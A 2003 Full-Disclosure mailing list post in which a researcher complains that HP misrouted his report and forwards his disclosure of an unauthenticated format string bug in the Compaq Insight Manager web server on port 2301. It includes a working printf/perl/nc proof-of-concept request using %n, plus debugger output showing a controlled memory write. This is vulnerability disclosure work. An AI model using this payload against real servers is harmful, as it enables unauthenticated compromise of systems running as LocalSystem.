Re: FW: Please investigate (KMM6769685V17014L0KM)

[mcw () wcd se]

> Not for security-alert () hp com. Please make sure appropriate
> HP organization replies to the customer:
>
>     mcw () wcd se
>
>
> Yours truly,
>  SOFTWARE SECURITY RESPONSE TEAM (SSRT)
>  Hewlett-Packard Company
>  HP Services
.....

Okay, so this formatstring bug in WBEM Web server is not a Security issue?

You can test it on your own, nearest production server or client,
no matter what box you test this on, only one thing,
it _must_ have Compaq Insight Manager installed.
(Hint: You don't need any login/password, as this issue is in the Web server)

I give a shit about this bug, i was only informing you about it,
but if this sick mailing continues every time i report a SECURITY issue
i have found to you, i'll never bother you againg and only post it
to Full-Disclosure list.. (Same crap as last time... gah)

Have a nice day
/bashis

> Dear Compaq Customer,
>
>
> It would help me to provide you with an accurate solution, if you could 
> provide the following additional details: 
>
> *  The name and model of your Compaq product, for example: Presario
>    5400. 
> *  The hardware or software that has been installed recently. 
> *  The serial number. The serial number can be found on a sticker 
>    attached to the side of your computer.
> *  The exact error message you received and the events that led to 
>    the error (i.e., whether the error message was received after a 
>    program was installed.) 
> *  The operating system installed on the computer (for example: Windows 
>    98.) 
>
> With the above information, I will be able to investigate the issue 
> further and provide you with a solution. 
>
> Thank you for taking the time to contact us.  Please reply if I can be 
> of further assistance.
>
> Regards,
>
> Suresh Babu Sharath
> HP Consumer eSupport
>
> For additional or future service assistance, you can post your question 
> to the Customer Communities at:  http://www.compaq.com/communities
>
> "Our advice is strictly limited to the question(s) asked and is based on
> the information provided to us.  HP does not assume any responsibility 
> or liability for the advice given and shall not be liable for any 
> direct, indirect, special, incidental or consequential damages in 
> connection with the use of this information.  Always back up your data. 
> For more information, including technical information updates, please 
> visit our Web site at http://www.hp.com/go/support.";
>
>
> Original Message Follows:
> -------------------------
>
> This message has been rerouted to you by the HP.COM email router.  If 
> this message has been sent to you in error, please forward back to the 
> email router mailbox at REROUTER,HPCOM per HP email directory or HPCOM 
> REROUTER per CPQ email directory.
> Original message follows:
> -------------------------
>
>
>
> Not for security-alert () hp com. Please make sure appropriate
> HP organization replies to the customer:
>
>     mcw () wcd se
>
>
> Yours truly,
>  SOFTWARE SECURITY RESPONSE TEAM (SSRT)
>  Hewlett-Packard Company
>  HP Services
>
> ------- Forwarded Message
>
> Date:    Sun, 03 Aug 2003 17:03:43 +0200
> From:    mcw () wcd se
> To:      security-alert () hp com
> cc:      full-disclosure () lists netsys com
> Subject: formatstring bug in Compaq HTTP Servers
>
> Hi there
>
> There is a formatstring bug in Compaq HTTP Servers.
> [in <!.DebugSearchPaths>?Url=> requests]
>
> The HTTP server runs with LocalSystem account.
>
> Versions:
> All versions i have tested had this formatstring bug.
>
> To be shure that it wasn't allready fixed, i downloaded this new 
> version..
> Insight Management Agent  
> Version: 5.00 H (01/17/2003) 
>
> http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&Softw
> areVer=
> 17022
>
> Request:
> $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print 
> "A"x14'`BBBB`perl -e
>  'print
>  ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
>
> Result:
> 0:005> g
> (9a8.934): Access violation - code c0000005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 
> edi=00000800
> eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0         nv up ei pl zr na 
> po nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             
> efl=00010246
> MSVCRT!setvbuf+65d:
> 780127a8 8908             mov     [eax],ecx         
> ds:0023:42424242=????????
> *** WARNING: Unable to verify checksum for 
> C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1
> \CpqHMMO.dll
> *** ERROR: Symbol file could not be found.  Defaulted to export symbols 
> for C:PROGRA~1\Compaq
> \COMPAQ~1\CPQWEB~1\CpqHMMO.dll - 
>
> Have a nice day
> /bashis
>
>
> ------- End of Forwarded Message

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html